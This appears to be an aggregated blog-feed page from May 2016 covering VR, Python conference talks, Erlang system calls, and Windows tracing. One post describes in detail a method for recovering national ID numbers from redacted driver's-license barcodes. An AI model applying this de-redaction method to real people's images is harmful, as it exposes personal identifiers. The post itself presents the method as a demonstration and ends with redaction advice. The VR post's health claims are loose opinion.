It's a fairly simple idea: you're on a raft, on a river. You're holding a paddle (the VR controller, which is tracked to milimeter level by Magic Technology, and thus means you can move things in the virtual world with your hands). Stick paddle in water, paddle, repeat.

(If you happen to have a Vive, you can download it here - let me know what you think!)

It's fun. It's immersive. And most interestingly, it's rather exhausting. Not quite as much work as padding a real raft, but you can build up a sweat doing it.

Indeed, currently most of the top room-scale VR experiences combine those three things - fun, immersive, and actual exercise.

Take Hover Junkers, for example, a multiplayer competitive shooting game where you're building defences and blasting away at rivals both from your own little mini-hovercraft. Here's a video of two people playing a round of Hover Junkers .

It's genuinely very hard work. The amount of squatting you'll do challenges most people's level of physical fitness. But at the same time, it's a highly addictive, very entertaining computer game.

Recommended minimum exercise levels in the UK are approximately 75 minutes of vigorous exercise a week. Most of the population don't even manage to get to that.

Recommended minimum play time to get into DOTA2, one of the most popular competitive computer games available right now, is around 10 hours per week. That's a minimum. Lots of people play a lot more.

(There's a famous review of DOTA2 on Steam which simply reads "Pretty good. Didn't play much.". It has 10,000 hours of play time listed.)

So the result of gaming, particularly competitive gaming, colliding with roomscale VR? Anyone who's into competitive gaming in VR is going to be ripped.

Even those of us who mostly play single-player games will get our exercise minima and then some. One brisk walk across Azeroth in World of Warcraft (with interludes to shoot at, hack apart or run away from the wildlife) or a couple of in-game days of hard manual labour in Stardew Valley will do it.

Forget the stereotype of the overweight gamer - the top gamers of tomorrow are going to be triathelete-level fit.

Less Eyestrain

When I first acquired a VR headset, I took it to my optician to check that it wasn't going to do anything horrible to my eyes. And unexpectedly, rather than giving me a stern talking-to about time spent in front of screens, he got very excited.

It turns out that VR could be rather good for the eyes of anyone using it - much better than using a regular monitor, in many ways.

Why? The main reason is convergence. Humans are evolved to look at the horizon, scanning for prey and predators. Staring at things very close to us, not so much.

If prey's already within 20 inches of so of our face, chances are the deal's done. And if a predator's that close, well, it's a bad day for Ms Hunter-Gatherer and a good day for Captain Stripey McBigTeeth.

(As a side note, we also evolved to look at green things a lot, hence why green is the most relaxing colour for our eyes to stare at. Hence old-school green-text CRT monitors.)

Focusing on something very close to us for 8-12 hours a day is very much not what our eyes are good at, and it's starting to cause serious problems. In fact, my optician recently referred to computer vision syndrome as an "epidemic".

Enter VR.

In a VR headset, you're more or less focusing on infinity, from the point of view of convergence between your two eyes. You're also focusing considerably further away from the point of view of individual eyes, too - approximately 1.2m in the Vive, which is a lot better than 40cm on average for a computer screen.

And in VR, you can simply create any size of screen you like, and work on that. There's an app called Virtual Desktop which allows the user to project his or her usual desktop up onto a massive IMAX-sized screen, and work there.

VR: it's coming to save our eyesight.

Less Mental Illness

And finally, and arguably most exciting of all - VR looks like it's going to have some major applications in treating mental illnesses of all kinds.

Studies are already showing that virtual experiences can be of considerable help in treating paranoia.

It also has a long history of use - hampered by the cost of old-fashioned VR headsets - in treating phobias, from agoraphobia to fear of spiders to fear of flying.

One VR developer reported on Reddit - very excited - that in developing a VR app with some significant height elements, they'd managed to cure their own fear of heights

And a clinical psychotherapist recently tried out the VR chat application AltSpace VR, and immediately became very excited about the possibilities for treating social anxiety, including his or her own, using AltSpace.

This is pretty remarkable, ground-breaking stuff: arguably offering a lot of the advantages of therapies using LSD or similar drugs that alter perception, without the obvious and unpleasant side effects.

So when the inevitable "VR is causing children to KILL" headlines come along, just remember - change on this scale causes a lot of effects, both good and ill. And it's already obvious there's plenty of likely good outcomes from this particular revolution!

What do you think? Have you tried VR? Noticed any positive effects?

by Hugh Hancock at 2016-05-13 14:17

Planet Python

Python Software Foundation: Python and Open Source Alive and Well in Havana, Cuba - Planet Python

I recently had the amazing opportunity to travel to Havana, Cuba to attend several free software events. My partner, David Mertz, was invited to talk at a meet-up of open-software developers and to present at the International Conference of Free Software sponsored by the Grupo de Usarios de Technologias Libres.
On my first day in Cuba, I attended the tenth Encuentro Social de Desarrolladores. This group, a regular meet-up of open-software developers, just last month held the first "PyDay Havana." At the meeting I attended, approximately 70 people gathered at a local Havana restaurant, La Casa de Potin. I was told that more people were interested in attending, but the space was limited so advance registration was cut off at 70. Several members of the enthusiastic crowd sported PyCon T-shirts--many from PyCon Montreal, perhaps as one could expect, but one from as far back as PyCon Chicago in 2009 (elegance begets simplicity). Clearly, this group has been using Python for quite awhile.
I met some wonderful people there: not only Olemis Lang and Medardo Antonio Rodriguez, members of the PSF’s Python-Cuba Work Group with whom I had been in touch previously, but also entrepreneurs and developers who regularly use free software. Justin, a graduate student in Astronomy at Yale, is spending several months in Cuba on a research project using Python. 
Another new connection I made is Abel Meneses Abad, a Computer Science professor at Central University of Las Villas in Santa Clara, Cuba. He told me about his use of Python with his students in Linguistics and his desire to share his experiences and get input from the larger Python community. We should be hearing more from him in the future.
The agenda for the meet-up included talks by Olemis Lang on Brython (and how to sign up for a Brython sprint to be held at the next week’s CubaCon) and by David Mertz on functional programming in Python. 
David Mertz talks about functional programming in Python

Medardo and Stripe Atlas reps address the meet-up
But the talk that garnered the most discussion was a presentation given by Medardo Rodriguez from Merchise Start-Ups how to start an online business. He was joined by representatives from the San Francisco-based company Stripe, which provides payment processing and business services for start-ups. Their newly launched service Stripe Atlas helps foreign online businesses incorporate in Delaware, MD, enabling them to take advantage of the well-developed business infrastructure in the U.S.

The overall mood of the meet-up was incredibly optimistic–surely a foreshadowing of the positive changes about to take place for Cuban software developers as more intercourse develops with the rest of the world and especially with the U.S. This is a community poised to grow, and I am beyond thrilled that the PSF will be a part of this.
I would love to hear from readers. Please send feedback, comments, or blog ideas to me at msushi@gnosis.cx.

by Planet Python at 2016-05-13 14:06

Planet Python

Reinout van Rees: Pygrunn keynote: Morepath under the hood - Martijn Faassen - Planet Python

(One of my summaries of the one-day 2016 PyGrunn conference).

Martijn Faassen is well-known from lxml, zope, grok. Europython, Zope foundation. And he's written Morepath, a python web framework.

Three subjects in this talk:

  • Morepath implementation details.
  • History of concepts in web frameworks
  • Creativity in software development.

Morepath implementation details. A framework with super powers ("it was the last to escape from the exploding planet Zope")

Traversal. In the 1990's you'd have filesystem traversal. example.com/addresses/faassen would map to a file /webroot/addresses/faassen.

In zope2 (1998) you had "traversal through an object tree. So root['addresses']['faassen'] in python. The advantage is that it is all python. The drawback is that every object needs to know how to render itself for the web. It is an example of creativity: how do we map filesystem traversal to objects?.

In zope3 (2001) the goal was the zope2 object traversal, but with objects that don't need to know how to handle the web. A way of working called "component architecture" was invented to add traversal-capabilities to existing objects. It works, but as a developer you need to quite some configuration and registration. Creativity: "separation of concerns" and "lookups in a registry"

Pyramid sits somewhere in between. And has some creativity on its own.

Another option is routing. You map a url explicitly to a function. A @route('/addresses/{name}') decorator to a function (or a django urls.py). The creativity is that is simple.

Both traversal and routing have their advantages. So Morepath has both of them. Simple routing to get to the content object and then traversal from there to the view.

The creativity here is "dialectic". You have a "thesis" and an "antithesis" and end up with a "synthesis". So a creative mix between two ideas that seem to be opposites.

Apart from traversal/routing, there's also the registry. Zope's registry (component architecture) is very complicated. He's now got a replacement called "Reg" (http://reg.readthedocs.io/).

He ended up with this after creatively experimenting with it. Just experimenting, nothing serious. Rewriting everything from scratch.

(It turned out there already was something that worked a bit the same in the python standard library: @functools.singledispatch.)

He later extended it from single dispatch to multiple dispatch. The creativity here was the freedom to completely change the implementation as he was the only user of the library at that moment. Don't be afraid to break stuff. Everything has been invented before (so research). Also creative: it is just a function.

A recent spin-off: "dectate". (http://dectate.readthedocs.io/). A decorator-based configuration system for frameworks :-) Including subclassing to override configuration.

Some creativity here: it is all just subclassing. And split something off into a library for focus, testing and documentation. Split something off to gain these advantages.

by Planet Python at 2016-05-13 13:45

Julia Evans

Investigating Erlang by reading its system calls - Julia Evans

I was helping debug a performance problem (this networking puzzle) in an Erlang program yesterday. I learned that Erlang is complicated, and that we can learn maybe 2 things about it by just looking at what system calls it's running.

Now -- I have never written an Erlang program and don't really know anything about Erlang, so "Erlang seems complicated" isn't meant as a criticism so much as an observation and something I don't really understand. When I'm debugging a program, whether I know the programming language it's written in or not, I often use strace to see what system calls it runs. In my few experiments so far, the Erlang virtual machine runs a TON of system calls and I'm not sure exactly what it's doing. Here are some experimental results.

I write 4 programs: hello.c, hello,java, hello.erl, and hello.py. Here they are.

#include <stdio.h>
int main() {
    printf("hello!\n");
}
class Hello {
    public static void main(String[] args)  {
        System.out.println("hello!");
    }
}
-module(hello).
-export([hello_world/0]).

hello_world() ->
    io:fwrite("Hello, world!\n").⏎ 
print "hello"

Here are the number of system calls each of these programs made: (you can see the full strace output here). You can generate this yourself with, for instance, strace -f -o python.strace python hello.py

wc -l *.strace
     38 c.strace
   1550 python.strace
   2699 java.strace
  15043 erlang.strace

Unsurprisingly, C comes in at the least. I was surprised that the Erlang VM runs 6 times as many system calls as Java -- I think of Java as already being pretty heavyweight. Maybe this is because Erlang starts up processes on all my cores? The variety of system calls is also interesting to see: I put the system call frequencies in a gist too.

When you look at the system call frequencies, you can see that Erlang is running significantly different kinds of system calls than Java and Python and C. Those 3 languages are mostly doing open, read, lseek, stat, mmap, mprotect, fstat -- all activities around reading a bunch of files & allocating memory, which is what I think of as normal behavior when starting a program.

The top 2 syscalls for the Erlang process are futex and sched_yield. So there's a lot of synchronization happening (the futex), and the operating system threads Erlang starts up keep scheduling themselves off the CPU "ok, I'm done, you go!". There are also a lot of mysterious-to-me ppoll system calls. So Erlang seems like a programming language with really significantly different primitives.

This highly concurrent behavior is consistent with what Wikipedia article says:

Erlang's main strength is support for concurrency. It has a small but powerful set of primitives to create processes and communicate among them.

Let's look a little more carefully at these ppoll system calls for a second. The story starts with

8682  openat(AT_FDCWD, "/sys/devices/system/node/node0", O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC) = 4
8703  ppoll([{fd=4, events=POLLIN|POLLRDNORM}, {fd=0, events=POLLIN|POLLRDNORM}], 2, {0, 0}, NULL, 8) = 0 (Timeout)

I have no idea what /sys/devices/system/node/node0 is, but it seems to be a directory and what ppoll is looking for changes to? I don't really get this at all.

One last thing -- erlang runs bind once when it starts. Why does it need to listen on a TCP socket to run hello world? I was very confused about this and unable to figure it out. Some people on twitter thought it might have something to do with epmd, but epmd seems to be a separate process. So I don't know what's going on.

<3 operating systems

I wanted to write this down because, as you all very well know, I think it's interesting to take an operating systems-level approach to understanding what a program is doing and I thought this was a cool example of that.

I had this interesting experience yesterday where I was looking at this Erlang problem with Victor and David and they had OS X machines and I was like "dude I can't debug anything on OS X". So we got it working on my laptop and then I could make a lot more progress. Because now I'm pretty good at OS-level debugging tools, and I've spent a lot of time learning about Linux, and so I'm not super comfortable on non-Linux systems. (I know, I know, dtrace is amazing, I'm going to learn it one day soon, I promise :) )

by Julia Evans at 2016-05-13 13:24

homu + highfive: awesome bots that make open source projects easier - Julia Evans

Someone described my approach to blogging as "fanfiction" recently, a description that I kind of loved. A lot of the time I write about things that I find in the world that love and my take on them. So here is a small thing I saw that I liked!

The other day I submitted a pull request to an open source project (rust-lang/libc) for the first time in a while and it was a really delightful experience! There were two bots involved and they were both great.

The first thing that happened is rust-highfive-bot commented. It said:

Thanks for the pull request, and welcome! The Rust team is excited to review your changes, and you should hear from @alexcrichton (or someone else) soon.

I was like YAY! The aforementioned @alexcrichton responded almost immediately, saying

@bors: r+ 1931ee4

Thanks!

Cool! What is this mysterious r+ 1931ee4 incantation? What is he saying? Basically he's saying "this looks reasonable; fine with me as long as the tests pass!" Who is @bors?

bors is the Github account of a homu, homu.io bot. Homu's job is to make it so that you don't have to keep checking to see if the tests pass! This is a huge blessing on this particular repository because the tests take like an hour. Also, the tests seem to be flaky or something, so they failed a few times and bors took care of rerunning them. here is the pull request, and you can see it getting merged!.

I'm really into homu. It's the second iteration of a piece of software called bors by Graydon Hoare, and there's a great blog post talking about it and highfivebot called Rust infrastructure can be your infrastructure.

by Julia Evans at 2016-05-13 12:56

Planet Python

Reinout van Rees: Pygrunn: from code to config and back again - Jasper Spaans - Planet Python

(One of my summaries of the one-day 2016 PyGrunn conference).

Jasper works at Fox IT, one of the programs he works on is DetACT, a fraud detection tool for online banking. The technical summary would be something like "spamassassin and wireshark for internet traffic".

  • Wireshark-like: DetACT intercepts online bank traffic and feeds it to a rule engine that ought to detect fraud. The rule engine is the one that needs to be configured.
  • Spamassassin-like: rules with weights. If a transaction gets too many "points", it is marked as suspect. Just like spam detection in emails.

In the beginning of the tool, the rules were in the code itself. But as more and more rules and exceptions got added, maintaining it became a lot of work. And deploying takes a while as you need code review, automatic acceptance systems, customer approval, etc.

From code to config: they rewrote the rule engine from start to work based on a configuration. (Even though Joel Spolsky says totally rewriting your code is the single worst mistake you can make). They went 2x over budget. That's what you get when rewriting completely....

The initial test with hand-written json config files went OK, so they went to step two: make the configuration editable in a web interface. Including config syntax validation. Including mandatory runtime performance evaluation. The advantage: they could deploy new rules much faster than when the rules were inside the source code.

Then... they did a performance test at a customer.... It was 10x slower than the old code. They didn't have enough hardware to run it. (It needs to run on real hardware instead of in the cloud as it is very very sensitive data).

They fired up the profiler and discovered that only 30% of the time is spend on the actual rules, the other 70% is bookkeeping and overhead.

In the end they had the idea to generate python code from the configuration. They tried it. The generated code is ugly, but it works and it is fast. A 3x improvement. Fine, but not a factor of 10, yet.

They tried converting the config to AST (python's Abstract Syntax Tree) instead of to actual python code. Every block was turned into an AST and then combined based on the config. This is then optimized (which you can do with an AST) before generating python code again.

This was fast enough!

Some lesons learned:

  • Joel Spolsky is right. You should not rewrite your software completely. If you do it, do it in very small chunks.
  • Write readable and correct code first. Then benchmark and profile
  • Have someone on your team who knows about compiler construction if you want to solve these kinds of problems.

by Planet Python at 2016-05-13 12:56

Reinout van Rees: Pygrunn: simple cloud with TripleO quickstart - K Rain Leander - Planet Python

(One of my summaries of the one-day 2016 PyGrunn conference).

What is openstack? A "cloud operating system". Openstack is an umbrella with a huge number of actual open source projects under it. The goal is a public and/or private cloud.

Just like you use "the internet" without concerning yourself with the actual hardware everything runs on, just in the same way you should be able to use a private/public cloud on any regular hardware.

What is RDO? Exactly the same as openstack, but using RPM packages. Really, it is exactly the same. So a way to get openstack running on a Red Hat enterprise basis.

There are lots of ways to get started. For RDO there are three oft-used ones:

  • TryStack for trying out a free instance. Not intended for production.

  • PackStack. Install openstack-packstack with "yum". Then you run it on your own hardware.

  • TripleO (https://wiki.openstack.org/wiki/TripleO). It is basically "openstack on openstack". You install an "undercloud" that you use to deploy/update/monitor/manage several "overclouds". An overcloud is then the production openstack cloud.

    TripleO has a separate user interface that's different from openstack's own one. This is mostly done to prevent confusion.

    It is kind of heavy, though. The latest openstack release (mitaka) is resource-hungry and needs ideally 32GB memory. That's just for the undercloud. If you strip it, you could get the requirement down to 16GB.

To help with setting up there's now a TripleO quickstart shell script.

by Planet Python at 2016-05-13 11:56

Bluejo's Journal

Visiting France - Bluejo's Journal

I know I won't remember every tree
Nobody could, this new-tipped bushy fir,
This flowering chestnut, all of them will blur,
Into a fuzz of green, unfolding free.

Maybe I'll keep the rivers, Sorgue, Loire, Seine,
Rippling along, which was that bridge at night,
Reflecting in the water silken light?
So history blends Caesar, Charlemagne.

These people walking fast to work or play,
So chic, they smile, disputing what they're told,
As Voltaire walked here with du Chatelet.

A country is too big a thing to hold
And yesterday gets tangled with today
And memories and time turn all leaves gold.

This poem sponsored by my awesome Patreon patrons, and written today on the train between Orleans and Paris.

by Bluejo's Journal (bluejo@gmail.com) at 2016-05-13 11:48

Planet Python

Reinout van Rees: Pygrunn: Understanding PyPy and using it in production - Peter Odding/Bart Kroon - Planet Python

(One of my summaries of the one-day 2016 PyGrunn conference).

pypy is "the faster version of python".

There are actually quite a lot of python implementation. cpython is the main one. There are also JIT compilers. Pypy is one of them. It is by far the most mature. PyPy is a python implementation, compliant with 2.7.10 and 3.2.5. And it is fast!.

Some advantages of pypy:

  • Speed. There are a lot of automatic optimizations. It didn't use to be fast, but since 5 years it is actually faster than cpython! It has a "tracing JIT compiler".
  • Memory usage is often lower.
  • Multi core programming. Some stackless features. Some experimental work has been started ("software transactional memory") to get rid of the GIL, the infamous Global Interpreter Lock.

What does having a "tracing JIT compiler" mean? JIT means "Just In Time". It runs as an interpreter, but it automatically identifies the "hot path" and optimizes that a lot by compiling it on the fly.

It is written in RPython, which is a statically typed subset of python which translates to C and is compiled to produce an interpreter. It provides a framework for writing interpreters. "PyPy" really means "Python written in Python".

How to actually use it? Well, that's easy:

$ pypy your_python_file.py

Unless you're using C modules. Lots of python extension modules use C code that compile against CPython... There is a compatibility layer, but that catches only 40-60% of the cases. Ideally, all extension modules would use "cffi", the C Foreign Function Interface, instead of "ctypes". CFFI provides an interface to C that allows lots of optimizations, especially by pypy.

Peter and Bart work at paylogic. A company that sells tickets for big events. So you have half a million people trying to get a ticket to a big event. Opening multiple browsers to improve their chances. "You are getting DDOSed by your own customers".

Whatever you do: you still have to handle 500000 pageviews in just a few seconds. The solution: a CDN for the HTML and only small JSON requests to servers. Even then then you still need a lot of servers to handle the JSON requests. State synchronisation was a problem as in the end you still had one single server for that single task.

Their results after using pypy for that task:

  • An 8-fold improvement. Initially 4x, but pypy has been optimized since, so they got an extra 2x for free. So: upgrade regularly.
  • Real savings on hosting costs
  • The queue has been tested to work for at least two million visitors now.

Guido van Rossum supposedly says "if you want your code to run faster, you should probably just use PyPy" :-)

Note: slides are online

by Planet Python at 2016-05-13 11:18

Reinout van Rees: Pygrunn: django channels - Bram Noordzij/Bob Voorneveld - Planet Python

(One of my summaries of the one-day 2016 PyGrunn conference).

Django channels is a project to make Django to handle more than "only" plain http requests. So: websockets, http2, etc. Regular http is the normal request/response cycle. Websockets is a connection that stays open, for bi-directional communication. Websockets are technically an ordered first-in first-out queue with message expiry and at-most-once delivery to only one listener at the time.

"Django channels" is an easy-to-understand extension of the Django view mechanism. Easy to integrate and deploy.

Installing django channels is quick. Just add the application to your INSTALLED_APPS list. That's it. The complexity happens when deploying it as it is not a regular WSGI deployment. It uses a new standard called ASGI (a = asynchronous). Currently there's a "worker service" called daphne (build in parallel to django channels) that implements ASGI.

You need to configure a "backing service". Simplified: a queue.

They showed a demo where everybody in the room could move markers over a map. Worked like a charm.

How it works behind the scenes is that you define "channels". Channels can recieve messages and can send messages to other channels. So you can have channel for reading incoming messages, do something with it and then send a reply back to some output channel. Everything is hooked up with "routes".

You can add channels to groups so that you can, for instance, add the "output" channel of a new connection to the group you use for sending out status messages.

by Planet Python at 2016-05-13 10:22

Planet Python

Reinout van Rees: Pygrunn: Kliko, compute container specification - Gijs Molenaar - Planet Python

(One of my summaries of the one-day 2016 PyGrunn conference).

Gijs Molenaar works on processing big data for large radio telescopes ("Meerkat" in the south of Africa and "Lofar" in the Netherlands).

The data volumes coming from such telescopes are huge. 4 terabits per seconds, for example. So they do a log of processing and filtering to get that number down. Gijs works on the "imaging and calibration" part of the process.

So: scientific software. Which is hard to install and fragile. Especially for scientists. So they use ubuntu's "lauchpad PPA's" to package it all up as debian packages.

The new hit nowadays is docker. Containerization. A self-contained light-weight "virtual machine". Someone called it centralized agony: only one person needs to go through the pain of creating the container and all the rest of the world can use it... :-)

His line of work is often centered around pipelines. Data flows from one step to the other and on to the next. This is often done with bash scripts.

Docker is nice and you can hook up multiple dockers. But... it is all network-centric: a web container plus a database container plus a redis container. It isn't centered on data flows.

So he build something new: kliko. He's got a spec for "kliko" containers. Like "read your input from /input". "Write your output to /output". There should be a kliko.yml that defines the parameters you can pass. There should be a /kliko script as an entry point.

Apart from the kliko container, you also have the "kliko runner". It is the actor that runs the container. It runs the containers with the right parameters. You can pass the parameters on the command line or via a web interface. Perfect for scientists! You get a form where you can fill in the various parameters (defined in the kliko.yml file) and "just" run the kliko container.

An idea: you could use it almost as functional programming: functional containers. Containers that don't change the data they're operating on. Every time you run it on the same input data, you get the same results. And you can run them in parallel per definition. And you can do fun things with caching.

There are some problems with kliko.

  • There is no streaming yet.
  • It is filesystem based at the moment, which is slow.

These are known problems which are fine with what they're currently using it for. They'll work on it, though. One thing they're also looking at is "kliko-compose", so something that looks like "docker-compose".

Some (fundamental) problems with docker:

  • Docker access means root access, basically.
  • GPU acceleration is crap.
  • Cached filesystem layers is just annoying. In first instance it seems fine that all the intermediary steps in your Dockerfile are cached, but it is really irritating once you install, for instance, debian packages. They're hard to update.
  • You can't combine containers.

by Planet Python at 2016-05-13 08:27

Reinout van Rees: Pygrunn: Micropython, internet of pythonic things - Lars de Ridder - Planet Python

(One of my summaries of the one-day 2016 PyGrunn conference).

micropython is a project that wants to bring python to the world of microprocessors.

Micropython is a lean and fast implementation of python 3 for microprocessors. It was funded in 2013 on kickstarter. Originally it only ran on a special "pyboard", but it has now been ported to various other microprocessors.

Why use micropython? Easy to learn, with powerful features. Native bitwise operations. Ideal for rapid prototyping. (You cannot use cpython, mainly due to RAM usage.)

It is not a full python, of course, they had to strip things out. "functools" and "this" are out, for instance. Extra included are libraries for the specific boards. There are lots of memory optimizations. Nothing fancy, most of the tricks are directly from compiler textbooks, but it is nice to see it all implemented in a real project.

Some of the supported boards:

  • Pyboard
  • The "BBC micro:bit" which is supplied to 1 million school children!
  • Wipy. More of a professional-grade board.
  • LoPy. a board which supports LoRa, an open network to connect internet-of-things chips.

Development: there is one full time developer (funded by the ESA) and two core contributors. It is stable and feels like it is maturing.

Is it production ready? That depends on your board. It is amazing for prototyping or for embedding in games and tools.

by Planet Python at 2016-05-13 07:34

Random ASCII

UIforETW is No Longer a CPU Hog - Random ASCII

A few months ago I wrote about how many processes on my system were waking up and wasting CPU time for no good reason, thus wasting battery power, electricity, and CPU power. I was surprised that nobody called me out on the hypocrisy of my complaints because UIforETW, my open-source ETW trace recording and management tool, was not well behaved when idle.

This has now been fixed.

UIforETW creates numerous threads that monitor performance related aspects of the imagesystem, such as battery drain, CPU power consumption, timer status, user input, etc. These data are emitted as ETW events that show up in the recorded traces and which can then be used to help understand and analyze the ETW traces.

This is all good, and the overhead of these monitoring threads was designed to be small enough that it would not perturb the processes being profiled.

However “small enough overhead” on a busy system is not the same as “small enough overhead” on an idle system. Originally when UIforETW was open but not currently tracing these threads were still running – waking up many times per second, calculating data, and emitting events that were effectively directed to /dev/null.

As of change 72c71dd I’ve rewritten the monitors so that they start and stop with tracing. This dropped the number of context switches and the CPU usage (monitored with sysinternals’ procexp) of an idle UIforETW significantly. However I was still seeing about ten context switches per second. Hmmm…

imageI used UIforETW\bin\metatrace.bat to record a trace of UIforETW sitting idle. metatrace.bat is useful because it uses a different kernel provider and can therefore be used to profile UIforETW even during trace startup and shutdown. The trace showed that the context switches were on a windows message call stack. I tried using Spy++ to see what type of message was coming in but couldn’t get that to work. I then noticed that the bursts of activity were happening exactly once a second, as can be seen on the WPA screenshot below which graphs context switch counts for UIforETW against elapsed time in seconds:

image

imageA search for SetTimer in the UIforETW source showed a call that I had added months ago. Each time a timer message is received UIforETW checks to see if tracing to a file has been running too long. This is a good feature but doesn’t need to be running when tracing is not, so I changed the code so that now the timer only runs during tracing. I also changed it to wake up every thirty seconds instead of every second – precise timing is not relevant for this feature.

The net result of these changes is that now if you have UIforETW running and you aren’t recording a trace then the CPU overhead is zero. UIforETW will go for long periods of time without a single context switch. This means that UIforETW has gone from being a poster-child for a poorly behaved background application to proof that staying perfectly idle is actually quite easy. This blog post was easy to write but I still spent longer writing it than I did making the changes to UIforETW.

image

It’s worth noting that UIforETW didn’t lose any functionality from these changes. And it’s also worth noting that I did not try to reduce the number of threads, just the number of threads that were waking up for no reason. So, for instance, the DirectoryMonitorThread – which waits on file notification events so that UIforETW can update its trace list automatically – is still running all the time. It wakes up when it needs to do something and is otherwise just sitting on the kernel’s list of threads that don’t need to run.

So, I repeat my entreaty: write your software so that it doesn’t wake up periodically “just in case”. Wake up only when necessary, and be particularly careful about this when your application is not active. If you are wasteful then I will uninstall your software, and encourage others to do likewise.

And you should grab the latest version of UIforETW, for this improvement and a few others.

Aside: What is UIforETW? It’s an open source tool for recording and managing ETW traces to allow investigation of performance problems on Windows in incredible detail. You can find more details here (or at this more memorable url: https://tinyurl.com/etwcentral).


by brucedawson at 2016-05-13 06:16

absorptions

Barcode recovery using a priori constraints - absorptions

Barcodes can be quite resilient to redaction. Not only is the pattern a strong visual signal, but also the encoded string that often has a rigidly defined structure. Here I present a method for recovering the data from a blurred, pixelated, or even partially covered barcode using prior knowledge of this higher-layer structure. This goes beyond so-called "deblurring" or blind deconvolution in that it can be applied to distortions other than blur as well.

It has also been a fun exercise in OpenCV matrix operations.

As example data, specimen pictures of Finnish driver's licenses shall be used. The card contains a Code 39 barcode encoding the cardholder's national identification number. This is a fixed-length string with well-defined structure and rudimentary error-detection, so it fits our purpose well. High-resolution samples with fictional data are available at government websites. Redacted and low-quality pictures of real cards are also widely available online, from social media sites to illustrations for news stories.

Nothing on the card indicates that the barcode contains sensitive information (knowledge of a name and this code often suffices as identification on the phone). Consequently, it's not hard to find pictures of cards with the barcode completely untouched either, even if all the other information has been carefully removed.

All cards and codes used in this post are simulated.

Image rectification

We'll start by aligning the barcode with the pixel grid and moving it into a known position. Its vertical position on the driver's license is pretty standard, so finding the card's corners and doing a reverse perspective projection should do the job.

Finding the blue EU flag seemed like a good starting point for automating the transform. However, JPEG is quite harsh on high-contrast edges and extrapolating the card boundary from the flag corners wasn't too reliable. A simpler solution is to use manual adjustments: an image viewer is opened and clicking on the image moves the corners of a quadrilateral on top of the image. cv::find­Homography() and cv::warp­Perspective() are then used to map this quadrilateral to a 857×400 rectangular image, giving us a rectified image of the card.

Reduction & filtering

The bottom 60 pixel rows, now containing our barcode of interest, are then reduced to a single 1D column sum signal using cv::reduce(). In this waveform, wide bars (black) will appear as valleys and wide spaces (white) as peaks.

In Code 39, all characters are of equal width and consist of 3 wide and 9 narrow elements (hence the name). Only the positions of the wide elements need to be determined to be able to decode the characters. A 15-pixel convolution kernel – cv::GaussianBlur() – is applied to smooth out any narrow lines.

A rectangular kernel matched to the bar width would possibly be a better choice, but the exact bar width is unknown at this point.

Constraints

The format of the driver's license barcode will always be *DDMMYY-NNNC*, where

  • The asterisks * are start and stop characters in Code 39
  • DDMMYY is the cardholder's date of birth
  • NNN is a number from 001 to 899, its least significant bit denoting gender
  • C is a modulo-31 checksum character; Code 39 doesn't provide its own checksum

These constraints will be used to limit the search space at each string position. For example, at positions 0 and 12, the asterisk is the only allowed character, whereas in position 1 we can have either the number 0, 1, 2, or 3 as part of a day of month.

If text on the card is readable then the corresponding barcode characters can be marked as already solved by narrowing the search space to a single character.

Decoding characters

It's a learning adventure so the decoder is implemented as a type of matched filter bank using matrix operations. Perhaps it could be GPU-friendly, too.

Each row of the filter matrix represents an expected 1D convolution output of one character. A row is generated by creating an all-zeroes vector with just the peak elements set to plus/minus unity. These rows are then convolved with a horizontal Lanczos kernel.

The exact positions of the peaks depend on the barcode's wide-to-narrow ratio, as Code 39 allows anything from 2:1 to 3:1. Experiments have shown it to be 2.75:1 in most of these cards.

The above 1D wave is divided into character-length pieces which are then multiplied per-element by this newly generated matrix using cv::Mat::mul(). The result is reduced to a row sum vector.

This vector now contains a "score", a kind of matched filter output, for each character in the search space. The best matching character is the one with the highest score; this maximum is found using cv::minMaxLoc(). Constraints are passed to the command as a binary mask matrix.

Barcode alignment and length

To determine the left and right boundaries of the barcode, an exhaustive search is run through the whole 1D signal (around 800 milliseconds). On each iteration the total score is calculated as a sum of character scores, and the alignment with the best total score is returned. This also readily gives us the best decoded string.

We can also enable checksum calculation and look for the best string with a valid checksum. This allows for errors elsewhere in the code.

Results

The barcodes in these images were fully recovered using the method presented above:

It might be possible to further develop the method to recover even more blurred images. Possible improvements could include fine-tuning the Lanczos kernel used to generate the filter bank, or coming up with a better way to score the matches.

Countermeasures

The best way to redact a barcode seems to be to draw a solid rectangle over it, preferably even slightly bigger than the barcode itself, and make sure it really gets rendered into the bitmap.

Printing an unlabeled barcode with sensitive data seems like a bad idea to begin with, but of course there could be a logical reason behind it.

by Oona Räisänen (noreply@blogger.com) at 2016-05-13 05:55

jwz

DNA Lounge update - jwz

DNA Lounge update, wherein the Snarkatron has been resurrected.

by jwz at 2016-05-13 05:02

Kevin and Kell

Plumber's snake - Kevin and Kell

Comic for Friday May 13th, 2016 - "Plumber's snake" [ view ]

On this day in 1996, Fiona was curious how Rudy was doing with his hunting ever since she started tutoring him. Not too good it would seem... [ view ]

Today's Daily Sponsor - No sponsor for this strip. [ support ]

by Kevin and Kell at 2016-05-13 05:00

xkcd.com

Black Hole - xkcd.com

It also brings all the boys, and everything else, to the yard.
Alt text: It also brings all the boys, and everything else, to the yard.

by xkcd.com at 2016-05-13 04:00

More Words, Deeper Hole

King George Needs a Home - More Words, Deeper Hole

Attention people in Waterloo County and neighboring regionL



10 year old King George is very sweet but shy. He needs a new home due to allergy issues. A friend is putting him up but her cats do not like him so that is probably not a long term solution.

If you would like to give a nice cat a nice home, contact george@literallysarah.com.

Also posted at Dreamwidth, where there are comment count unavailable comment(s); comment here or there.

by james_nicoll (jdnicoll@panix.com) at 2016-05-13 03:57

jwz

"One is supposed to put their penis into the hole lined with teeth." - jwz

I'm just gonna let Violet field this one:

From: Violet Blue
Subject: my new nightmare can be yours now too

I'm a dick for sending you this, but at least I don't have to suffer alone.

Here's the skeleton head for the base of a sex robot in production by Realbotix, the V2 which is called "Nova"

One is supposed to put their penis into the hole lined with teeth.

Let me ruin sex for you some more. Here's a video of the head making facial expressions without makeup:

Found via The Early Makings of a Talking Sex Robot.

If you must inflict this on the public, I don't mind if you screencap/quote this email. I almost feel like people should be warned about the coming storm of vagina dentata roombatas, certain to hoover up everyone's interest to sex once they see how the sausage is ground (in their impending nightmares, of course), so I might post about it outside my Sex News roundup later today.

Gotta go stash weapons around the house now, BRB.

by jwz at 2016-05-13 02:19

Planet Python

Dataquest: Matplotlib tutorial: Plotting tweets mentioning Trump, Clinton & Sanders - Planet Python

